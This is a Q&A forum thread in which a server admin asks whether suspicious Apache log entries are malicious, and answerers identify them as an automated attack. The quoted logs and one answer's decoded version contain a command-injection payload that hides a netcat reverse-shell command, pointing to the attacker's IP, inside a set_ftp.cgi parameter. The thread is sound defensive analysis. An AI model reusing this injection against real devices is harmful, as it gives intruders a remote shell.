0

I have a Nextcloud server running on Apache, and disabled my firewall for about 5 minutes while I ran an apt-update. I decided to check the logs after, and found this from an unknown IP. It looks like it is trying to run some sort of script. Does this look like it is malicious or just some web crawler? Thanks!

89.248.166.183 - - [15/Sep/2020:02:06:18 -0400] "GET login.cgi HTTP/1.1" 400 0 "-" "-" 
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fs>
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /ftptest.cgi?loginuse=&loginpas= HTTP/1.1\n" 400 0 "-" "-"
Gerald Schneider
  • 19,757
  • 8
  • 52
  • 79
user3207650
  • 1

2 Answers2

1

These kind of scripted attacks are normal if you have a web server with a public ip. "Good" web crawlers (Google, Bing, etc.) would identify themselves via the User-Agent header and would not try to login into your site.

claasz
  • 510
  • 3
  • 10
0

89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fs>

If you decode above log, you will get: /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(nc 89.248.166.183 1245 -e /bin/s>

Above request trying to connect to /bin/sh using nc (netcat), in netcat -e option used for specify filename to execute after connect.

But request returns with 400 Bad Request status code.

Amey Naniwadekar
  • 1
  • 2